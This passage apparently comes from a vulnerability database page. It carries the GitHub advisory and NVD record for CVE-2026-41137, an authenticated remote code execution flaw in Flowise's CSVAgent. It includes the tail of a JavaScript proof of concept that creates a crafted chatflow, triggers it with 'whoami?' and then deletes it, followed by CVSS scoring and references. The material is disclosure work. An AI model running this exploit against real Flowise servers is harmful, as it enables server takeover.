Name\\\",\\\"name\\\":\\\"modelName\\\",\\\"type\\\":\\\"asyncOptions\\\",\\\"loadMethod\\\":\\\"listModels\\\",\\\"default\\\":\\\"gpt-3.5-turbo-instruct\\\",\\\"id\\\":\\\"openAI_0-input-modelName-asyncOptions\\\"},{\\\"label\\\":\\\"Temperature\\\",\\\"name\\\":\\\"temperature\\\",\\\"type\\\":\\\"number\\\",\\\"step\\\":0.1,\\\"default\\\":0.7,\\\"optional\\\":true,\\\"id\\\":\\\"openAI_0-input-temperature-number\\\"},{\\\"label\\\":\\\"Max Tokens\\\",\\\"name\\\":\\\"maxTokens\\\",\\\"type\\\":\\\"number\\\",\\\"step\\\":1,\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"openAI_0-input-maxTokens-number\\\"},{\\\"label\\\":\\\"Top Probability\\\",\\\"name\\\":\\\"topP\\\",\\\"type\\\":\\\"number\\\",\\\"step\\\":0.1,\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"openAI_0-input-topP-number\\\"},{\\\"label\\\":\\\"Best Of\\\",\\\"name\\\":\\\"bestOf\\\",\\\"type\\\":\\\"number\\\",\\\"step\\\":1,\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"openAI_0-input-bestOf-number\\\"},{\\\"label\\\":\\\"Frequency Penalty\\\",\\\"name\\\":\\\"frequencyPenalty\\\",\\\"type\\\":\\\"number\\\",\\\"step\\\":0.1,\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"openAI_0-input-frequencyPenalty-number\\\"},{\\\"label\\\":\\\"Presence Penalty\\\",\\\"name\\\":\\\"presencePenalty\\\",\\\"type\\\":\\\"number\\\",\\\"step\\\":0.1,\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"openAI_0-input-presencePenalty-number\\\"},{\\\"label\\\":\\\"Batch Size\\\",\\\"name\\\":\\\"batchSize\\\",\\\"type\\\":\\\"number\\\",\\\"step\\\":1,\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"openAI_0-input-batchSize-number\\\"},{\\\"label\\\":\\\"Timeout\\\",\\\"name\\\":\\\"timeout\\\",\\\"type\\\":\\\"number\\\",\\\"step\\\":1,\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"openAI_0-input-timeout-number\\\"},{\\\"label\\\":\\\"BasePath\\\",\\\"name\\\":\\\"basepath\\\",\\\"type\\\":\\\"string\\\",\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"openAI_0-input-basepath-string\\\"},{\\\"label\\\":\\\"BaseOptions\\\",\\\"name\\\":\\\"baseOptions\\\",\\\"type\\\":\\\"json\\\",\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"openAI_0-input-baseOptions-json\\\"}],\\\"outputs\\\":{},\\\"outputAnchors\\\":[{\\\"id\\\":\\\"openAI_0-output-openAI-OpenAI|BaseLLM|BaseLanguageModel|Runnable\\\",\\\"name\\\":\\\"openAI\\\",\\\"label\\\":\\\"OpenAI\\\",\\\"description\\\":\\\"Wrapper around OpenAI large language models\\\",\\\"type\\\":\\\"OpenAI | BaseLLM | BaseLanguageModel | Runnable\\\"}],\\\"id\\\":\\\"openAI_0\\\",\\\"selected\\\":false},\\\"width\\\":300,\\\"height\\\":574,\\\"selected\\\":false,\\\"positionAbsolute\\\":{\\\"x\\\":238.83389711655053,\\\"y\\\":233.09962591816395},\\\"dragging\\\":false}],\\\"edges\\\":[{\\\"source\\\":\\\"openAI_0\\\",\\\"sourceHandle\\\":\\\"openAI_0-output-openAI-OpenAI|BaseLLM|BaseLanguageModel|Runnable\\\",\\\"target\\\":\\\"csvAgent_0\\\",\\\"targetHandle\\\":\\\"csvAgent_0-input-model-BaseLanguageModel\\\",\\\"type\\\":\\\"buttonedge\\\",\\\"id\\\":\\\"openAI_0-openAI_0-output-openAI-OpenAI|BaseLLM|BaseLanguageModel|Runnable-csvAgent_0-csvAgent_0-input-model-BaseLanguageModel\\\"}],\\\"viewport\\\":{\\\"x\\\":73.92828909845196,\\\"y\\\":-4.475777844396191,\\\"zoom\\\":0.7371346086455504}}\");\nconst payload = {\"name\":\"CSV PWN\",\"deployed\":false,\"isPublic\":false,\"flowData\":JSON.stringify(flowData),\"type\":\"CHATFLOW\"};\n\n// Create chatflow.\nlet res = await fetch(`${FLOWISE_HOST_URL}${CHATFLOWS_URL}`, {\n    method: \"POST\",\n    headers: {\n        \"Content-Type\": \"application/json\",\n        \"Authorization\": \"Bearer \u003cyour-api-key\u003e\"\n        //Alternative: \"x-request-from\": \"internal\"\n    },\n    body: JSON.stringify(payload)\n});\n\nlet resJson = await res.json();\nlet chatflowId = resJson?.id;\n\n// Trigger vuln.\nawait fetch(`${FLOWISE_HOST_URL}${PREDICTION_URL}/${chatflowId}`, {\n    method: \"POST\",\n    headers: {\n        \"Content-Type\": \"application/json\"\n    },\n    body: JSON.stringify({\"question\": \"whoami?\"})\n});\n\n// Cleanup.\nawait fetch(`${FLOWISE_HOST_URL}${CHATFLOWS_URL}/${chatflowId}`, {\n    method: \"DELETE\",\n    headers: {\n        \"Content-Type\": \"application/json\",\n        \"Authorization\": \"Bearer \u003cyour-api-key\u003e\"\n        //Alternative: \"x-request-from\": \"internal\"\n    }\n});\n```\n\n### Impact\nThis results in Remote Code Execution (RCE) and can allow an attacker to compromise the underlying server.",
  "id": "GHSA-9wc7-mj3f-74xv",
  "modified": "2026-04-16T21:44:15Z",
  "published": "2026-04-16T21:44:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Flowise: Code Injection in CSVAgent leads to Authenticated RCE"
}

FKIE_CVE-2026-41137

Vulnerability from fkie_nvd - Published: 2026-04-23 20:16 - Updated: 2026-04-23 21:16

Severity ?

9.4 (Critical) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0."
    }
  ],
  "id": "CVE-2026-41137",
  "lastModified": "2026-04-23T21:16:05.840",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 9.4,
          "baseSeverity": "CRITICAL",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "HIGH",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "HIGH",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-23T20:16:14.257",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41137 (GCVE-0-2026-41137)

GHSA-9WC7-MJ3F-74XV

Summary

Details

PoC

Impact

FKIE_CVE-2026-41137

Tags

Sightings

Nomenclature